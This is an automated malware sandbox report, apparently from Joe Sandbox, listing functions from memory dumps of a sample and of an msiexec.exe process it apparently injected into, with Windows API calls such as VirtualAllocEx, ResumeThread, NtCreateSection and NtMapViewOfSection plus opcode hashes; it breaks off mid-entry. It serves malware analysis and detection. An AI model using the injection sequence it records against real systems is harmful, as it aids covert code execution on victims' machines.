DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012ED666,?,?,?,?,?), ref: 012ED727

Memory Dump Source

Source File: 0000000A.00000002.1501945056.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12e0000_EqtGqZpPskFq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 74380976f85c7262a37fa844edd208f621f5788028965d38a78918a58d56104e
Instruction ID: e8221f228f10507f14af6f7b69ee978938be2abd204c01ab8ead7dcf873691ad
Opcode Fuzzy Hash: 74380976f85c7262a37fa844edd208f621f5788028965d38a78918a58d56104e
Instruction Fuzzy Hash: 7921E3B5D002499FDB10CFAAD984ADEBBF4AB48220F14841AE958A7350D378A944CF64

Function 071871BA Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0718722E

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 331f188dfcc47a05207f78d4ecb7a82c1a8ea9e36645a2cda34b03075052e360
Instruction ID: 013dc20fec444df8ef8780167f25d634c66402fcb1f86ddafaa3a8f6890899d9
Opcode Fuzzy Hash: 331f188dfcc47a05207f78d4ecb7a82c1a8ea9e36645a2cda34b03075052e360
Instruction Fuzzy Hash: A4113A759003499FDF10DFAAC845BDEBBF5EF88320F248819E515A7250C7759550CFA4

Function 012EA188 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012EB099,00000800,00000000,00000000), ref: 012EB2AA

Memory Dump Source

Source File: 0000000A.00000002.1501945056.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12e0000_EqtGqZpPskFq.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6e20cd52661caa62340f06218125949c3cbd0add295d590908655b8e223b9df8
Instruction ID: 67daddeac9a67a7ad215c404f199c01a96f36d738b145153869a0a1499a7d211
Opcode Fuzzy Hash: 6e20cd52661caa62340f06218125949c3cbd0add295d590908655b8e223b9df8
Instruction Fuzzy Hash: F71103B68003098FDB10CF9AC848BDEFBF8AF88320F50842AD519A7200C375A945CFA4

Function 07186BFA Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07186C62

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e98e07ef7d731d82ee6b05179d4288d1223efa9df79798f2ae09ecd149a76bdd
Instruction ID: 185e11b6d73bc52e215df994dd91717ac18c53665d156554e228f47149e25044
Opcode Fuzzy Hash: e98e07ef7d731d82ee6b05179d4288d1223efa9df79798f2ae09ecd149a76bdd
Instruction Fuzzy Hash: C5116AB59003498FDB20DFAAC4457EEFBF5EF88720F208819D519A7240CB79A940CFA4

Function 071871C0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0718722E

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1361141e77d343b03d12d7fba3ff063079aa757246ade5cf5821f98d6d6acd11
Instruction ID: a41db79efa49b112b938bd95d6dec8e9667f6305af3efbedeb057b6c031c3f9e
Opcode Fuzzy Hash: 1361141e77d343b03d12d7fba3ff063079aa757246ade5cf5821f98d6d6acd11
Instruction Fuzzy Hash: DD1137758003499FDB10DFAAC844BDEBBF5EF88320F248819E515A7290C775A540CFA4

Function 012EB238 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012EB099,00000800,00000000,00000000), ref: 012EB2AA

Memory Dump Source

Source File: 0000000A.00000002.1501945056.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12e0000_EqtGqZpPskFq.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a2b12e57fe01a31868dfc36b265c77a0eb5e381e2a2a2c7452f24168563c7929
Instruction ID: 54b22e636f169441259de30307bdcf456b2c5068fa602c7925d7deb9650aa5d1
Opcode Fuzzy Hash: a2b12e57fe01a31868dfc36b265c77a0eb5e381e2a2a2c7452f24168563c7929
Instruction Fuzzy Hash: F11112B6C0030A8FDB10CFAAC844BDEFBF4AF89320F10841AD519A7200C375A545CFA4

Function 07186C00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07186C62

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 46c89c1134d91f58bc0c76f96d46e6409e411ce2db5e0b92e17f88f5da51f697
Instruction ID: 06e6a5e087247c7ecd226a8105e330bd4b6f37aaf78d5ccabd9a958f15701edc
Opcode Fuzzy Hash: 46c89c1134d91f58bc0c76f96d46e6409e411ce2db5e0b92e17f88f5da51f697
Instruction Fuzzy Hash: 27113AB19003498FDB10DFAAC4457EEFBF5EF88620F248819D519A7240CB796944CF94

Function 0718A9A8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0718AA0D

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e97ff952b51378f8c33c34b0674152383d01fadba54b1205d6ac037b20add4a2
Instruction ID: e7a51c095453fc13cf935d0643aa15bcf02b05b33c15500b1efae2e6ebbc19e7
Opcode Fuzzy Hash: e97ff952b51378f8c33c34b0674152383d01fadba54b1205d6ac037b20add4a2
Instruction Fuzzy Hash: 581113B98003599FCB10DF9AD984BDEFBF8EB48320F20841AE518A7250C375A944CFA4

Function 07187508 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0718AA0D

Memory Dump Source

Source File: 0000000A.00000002.1515592722.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7180000_EqtGqZpPskFq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 896e22fd81953b62381604abd25c6c136cb70a09d0da0b806e6e8b52e1e3f17a
Instruction ID: 43b40ecf855c456b93ea207b90acef39be3ec4c9b310154edeb32ef44407ef32
Opcode Fuzzy Hash: 896e22fd81953b62381604abd25c6c136cb70a09d0da0b806e6e8b52e1e3f17a
Instruction Fuzzy Hash: 4511F5B5800349DFDB10DF9AC984BDEFBF8EB48720F10845AE514A7640C375A954CFA5

Function 012EAFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 012EB01E

Memory Dump Source

Source File: 0000000A.00000002.1501945056.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12e0000_EqtGqZpPskFq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bf0f4712c218ad478470d5e6a661f39bbe98c6c2492fe0176c4a9acc78b295ad
Instruction ID: 507fab71703d5e1dcf6f9c8cb0bee3495f7b955a795be6bdfb3e3badccb1f16d
Opcode Fuzzy Hash: bf0f4712c218ad478470d5e6a661f39bbe98c6c2492fe0176c4a9acc78b295ad
Instruction Fuzzy Hash: 051110B5C0034A8FDB24CF9AC448BDEFBF4AB88320F10841AD528A7210D379A545CFA5

Function 05201A98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05201A02

Memory Dump Source

Source File: 0000000A.00000002.1506700039.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5200000_EqtGqZpPskFq.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3f53a04f9aadafd804b5cf38f0ef14c0928bc2df8a21fc84695279ffc1cc5a6c
Instruction ID: 0cfb73eda52b05fe78c0d73d02a6f0d8196b3ce5208094afced983cfa7a193a8
Opcode Fuzzy Hash: 3f53a04f9aadafd804b5cf38f0ef14c0928bc2df8a21fc84695279ffc1cc5a6c
Instruction Fuzzy Hash: 3811A931C29359CFDB20DBE8C8447DCBBB0BF48314F20905AD009AB292C7B94469CB91

Function 0124D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1500404155.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_124d000_EqtGqZpPskFq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a199811ae0700d68dba0be22022b725aa368e27235850ee0f2cc8c8774318711
Instruction ID: ab14d5c9e7bae00c7f6e9dc47dff3b72163d0d5bf8b3303df21e2d7d8474e84b
Opcode Fuzzy Hash: a199811ae0700d68dba0be22022b725aa368e27235850ee0f2cc8c8774318711
Instruction Fuzzy Hash: 9F213371614208DFDB09DF54E8C0B26BF61FB98328F20C169E9090B246C736D416CBA2

Function 0124D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1500404155.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_124d000_EqtGqZpPskFq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec6a1cb2b683d5b04b88862d4ca473f931e15bd866a0d9eeb7184ee6df18c58a
Instruction ID: d3503eaf76b63e1dfc033e66e7d2909f19dc631f6a5d78c1e6913d1dc0e4b81a
Opcode Fuzzy Hash: ec6a1cb2b683d5b04b88862d4ca473f931e15bd866a0d9eeb7184ee6df18c58a
Instruction Fuzzy Hash: F72133B5614308DFDB09DF54D9C0B56BF65FBA8324F20C16DE90A0B246C37AE456CBA2

Function 0125D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1500626174.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_125d000_EqtGqZpPskFq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 296c728db389f3ed01deea10be87a5ea556c78c9ce42d42637e079ecb51a91af
Instruction ID: 64a6a989c0dd3b9a581cfea37fdab73a4dfac98ed45b07dfd929f185fae212b8
Opcode Fuzzy Hash: 296c728db389f3ed01deea10be87a5ea556c78c9ce42d42637e079ecb51a91af
Instruction Fuzzy Hash: C1212575614308DFDB41DF94D9C0B25BB61FB84324F20C56DDD098B243C376D846CA61

Function 0125D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1500626174.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_125d000_EqtGqZpPskFq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99dc051883f0309413b7622278b2eea53e98a24b961510f464d3201cf8655c12
Instruction ID: 1c005abd8d867529bea29fcfec2b38ccb3185eb8f78561f8a2358a73c9bad7af
Opcode Fuzzy Hash: 99dc051883f0309413b7622278b2eea53e98a24b961510f464d3201cf8655c12
Instruction Fuzzy Hash: 60210075614308DFDB55DF64D8C4B16BB61FB84324F20C56DDD0A4B286C37AD407CA62

Function 0125D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1500626174.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_125d000_EqtGqZpPskFq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bd79b0beb9b8a2babefde78898fb40f41408a8519be8d510f9b24636313d94
Instruction ID: 25742fc773f554a1fc63f89c26b054a738dc682a565d3646a0567118c6391bf3
Opcode Fuzzy Hash: 58bd79b0beb9b8a2babefde78898fb40f41408a8519be8d510f9b24636313d94
Instruction Fuzzy Hash: 75219A755093848FDB02CF24D9D0B15BF71EB46314F28C5EAD9498B2A7C33A980ACB62

Function 0124D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1500404155.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_124d000_EqtGqZpPskFq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: da84bbb6fa1d4a5b22ae8ebb1ea3dc9b61a910de85999b78c91741d564e545a6
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: 81112676504284CFCB16CF54E5C0B16BF72FB94324F24C6A9D9490B257C33AD45ACBA1

Function 0124D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1500404155.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_124d000_EqtGqZpPskFq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: 1019946411cde6adc191fde9dd55ed21cb84876cfbc1a041040c7b139edd209f
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: 551122B6504284CFCB06CF54D9C0B56BF72FB94324F24C2A9D9090B257C33AE45ACBA2

Function 0125D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1500626174.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_125d000_EqtGqZpPskFq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: edd064885d939ba75db71e62d028012bcbc301a947818ad98da4461c50c7dd19
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 3611BB75504284DFDB02CF54C5C0B15BBA2FB84224F24C6ADDD498B297C33AD44ACB61

Analysis Process: msiexec.exePID: 8124, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	624
Total number of Limit Nodes:	69

Executed Functions

Function 04B0A036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 04B0A19F

Strings

0, xrefs: 04B0A227

Memory Dump Source

Source File: 0000000B.00000002.3828504416.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4b00000_msiexec.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction ID: 19e54b187f0d1996e0a4ba4fbe6651e19e2d89b43bd8233e57f0d4a440f2f8de
Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction Fuzzy Hash: CEF12170518A4C8FDBA9EF68C894AEEBBE4FF98305F40466AD44AD7290DF34E541CB41

Function 04B09BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 04B09C93
NtMapViewOfSection.NTDLL ref: 04B09CFF
NtClose.NTDLL ref: 04B09DC5

Strings

@, xrefs: 04B09D0C
@, xrefs: 04B09C8B

Memory Dump Source

Source File: 0000000B.00000002.3828504416.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4b00000_msiexec.jbxd

Similarity

API ID: Section$CloseCreateView
String ID: @$@
API String ID: 1133238012-149943524
Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
Instruction ID: cdc591a03ccb5be73ac282b0173e6f986954c8f5e894b6ce4052f149ea0dcc4c
Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
Instruction Fuzzy Hash: F361927061CB088FDB58DF58D8856AABBE0FF98315F50462EE58AC3291DF35E441CB86

Function 04B09BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 04B09C93
NtMapViewOfSection.NTDLL ref: 04B09CFF

Strings

@, xrefs: 04B09D0C
@, xrefs: 04B09C8B

Memory Dump Source

Source File: 0000000B.00000002.3828504416.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4b00000_msiexec.jbxd

Similarity

API ID: Section$CreateView
String ID: @$@
API String ID: 1585966358-149943524
Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
Instruction ID: 9cf74617735f2c5f281b64c264ba421fb7393eba411a1a8177c4963c1ee68f96
Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
Instruction Fuzzy Hash: CF5190B06187088FD758DF18D885AAABBE0FB98304F50462EF58AC3291DF31E441CB86

Function 04B0A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 04B0A19F

Strings

0, xrefs: 04B0A0CD

Memory Dump Source

Source File: 0000000B.00000002.3828504416.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4b00000_msiexec.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction ID: e95476e430ef6474dd1768f418e5c8092b88f99fedfeef4bb31ae1811d7ea4a4
Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
Instruction Fuzzy Hash: D7512E70918A8C8FDB69EF68C8946EEBBF4FB98305F40466ED44AD7250DF30A645CB41

Function 02D0A350 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D04BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D04BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D0A39D

Strings

.z`, xrefs: 02D0A38D, 02D0A398

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 829f4a718b17a7008c1b0a6880f2dcfff9598768bfbdc658072cb9f6ee38b09e
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 04F0B2B2204208AFCB08CF88DC84EEB77ADAF8C754F158248BA1D97240C630E8118BA4

Function 02D0A34A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D04BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D04BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D0A39D

Strings

.z`, xrefs: 02D0A38D, 02D0A398

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: bdf9457ee4adabceb6ad95c52bd984dd37e18c7896723151c91c86ea59f5e0c3
Instruction ID: c2b66a06b2a97ee8750c589b8401075f4c35ef01e74c6bbb813080324cd875b6
Opcode Fuzzy Hash: bdf9457ee4adabceb6ad95c52bd984dd37e18c7896723151c91c86ea59f5e0c3
Instruction Fuzzy Hash: 45F019B2214149ABCB48DF98D884CEB7BA9EF8C314B14864CFA5C93201D630E851CBA0

Function 02D0A3FA Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02D04D62,5EB65239,FFFFFFFF,02D04A21,?,?,02D04D62,?,02D04A21,FFFFFFFF,5EB65239,02D04D62,?,00000000), ref: 02D0A445

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 56950cc0340f5dc347e78823ef7298126f16e242a323b4852ea218d331fe2180
Instruction ID: b6b980d48121eba624eca36fd7a9b7e14c9b6ac67511191d82d8a818ccbc0f16
Opcode Fuzzy Hash: 56950cc0340f5dc347e78823ef7298126f16e242a323b4852ea218d331fe2180
Instruction Fuzzy Hash: 2CF0E7B6200108AFCB14DF99CC81EEB77A9EF8C354F118248BA1DA7240DA31E815CBA0

Function 02D0A400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02D04D62,5EB65239,FFFFFFFF,02D04A21,?,?,02D04D62,?,02D04A21,FFFFFFFF,5EB65239,02D04D62,?,00000000), ref: 02D0A445

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: f1b584ddfd3dffdc4781ad4e661bd929c42fd30f2993a2c246238a568cc82fff
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: F8F0A4B2200208AFCB14DF99DC80EEB77ADEF8C754F158248BA1D97251DA30E8118BA0

Function 02D0A47B Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D04D40,?,?,02D04D40,00000000,FFFFFFFF), ref: 02D0A4A5

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 98ffb0119c7092cde2c645abd326e611a82d8bb32adc5853f3ac8d1e9bcc4959
Instruction ID: 2a9f505b8ccb78f9a44dc8b141c4befc4a2626dc0fa82d6930389312c055fff9
Opcode Fuzzy Hash: 98ffb0119c7092cde2c645abd326e611a82d8bb32adc5853f3ac8d1e9bcc4959
Instruction Fuzzy Hash: 59E08C76200310AFD710EB98CC86EE73BA8EF88720F014099BA1C5B292C530EA008AE0

Function 02D0A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D04D40,?,?,02D04D40,00000000,FFFFFFFF), ref: 02D0A4A5

Memory Dump Source

Source File: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2cf0000_msiexec.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 61a4bb4b03fc0ccd00ab29528628fdff21545e1c579bb460a252d1ae35efe844
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: B4D012762003146BD710EB98CC85F977B5DEF44750F154455BA1C5B281C530F90086E0

Function 04C22CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22CAA

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc155e88852f5837d867a7833a9b8b04b1621aaac12f46cef519ec2cfe11f145
Instruction ID: 896d9dd38b12a8d2f8df0e19dae3e1e65955413eaa0a21e2938308ce2afa345b
Opcode Fuzzy Hash: dc155e88852f5837d867a7833a9b8b04b1621aaac12f46cef519ec2cfe11f145
Instruction Fuzzy Hash: 0290027120140402F1007598540864600568BE0706F55D021B5029555EC665D9917131

Function 04C22C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C22C6A

Memory Dump Source

Source File: 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true

Associated: 0000000B.00000002.3828642531.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4bb0000_msiexec.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a65b709398ae689a3f8d502e41b117c4e7fab82455313b8b7df692e772dee9c
